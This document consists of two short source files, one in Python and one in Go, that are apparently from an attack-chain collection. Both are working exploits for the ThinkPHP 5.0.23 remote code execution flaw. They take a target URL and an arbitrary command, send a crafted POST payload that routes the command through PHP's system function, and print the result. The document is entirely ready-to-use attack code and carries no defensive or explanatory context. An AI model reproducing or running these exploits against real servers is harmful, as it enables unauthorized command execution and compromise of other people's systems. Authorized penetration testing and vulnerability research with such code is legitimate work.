File: attack-chains/RCE/thinkphp5.0.23_RCE/thinkphp5.0.23_RCE.py
import requests
import sys

if len(sys.argv) != 3:
    print(f"Usage: python {sys.argv[0]} <url> <command>")
    sys.exit(1)

url = sys.argv[1]
command = sys.argv[2]
payload = {
    "_method": "__construct",
    "filter[]": "system",
    "method": "get",
    "server[REQUEST_METHOD]": command
}
res = requests.post(url=url+"/index.php?s=captcha", data=payload)

print(res.text)

File: attack-chains/RCE/thinkphp5.0.23_RCE/thinkphp5.0.23_RCE.go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/url"
	"os"
	"strings"
	"time"
)

func main() {
	if len(os.Args) != 3 {
		fmt.Printf("Usage: %s <url> <command>\n", os.Args[0])
		os.Exit(1)
	}

	baseURL := os.Args[1]
	command := os.Args[2]

	targetURL := strings.TrimRight(baseURL, "/") + "/index.php?s=captcha"

	payload := url.Values{}
	payload.Set("_method", "__construct")
	payload.Add("filter[]", "system")
	payload.Set("method", "get")
	payload.Set("server[REQUEST_METHOD]", command)

	client := &http.Client{Timeout: 10 * time.Second}
	resp, err := client.PostForm(targetURL, payload)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer resp.Body.Close()

	body, _ := io.ReadAll(resp.Body)
	fmt.Println(string(body))
}
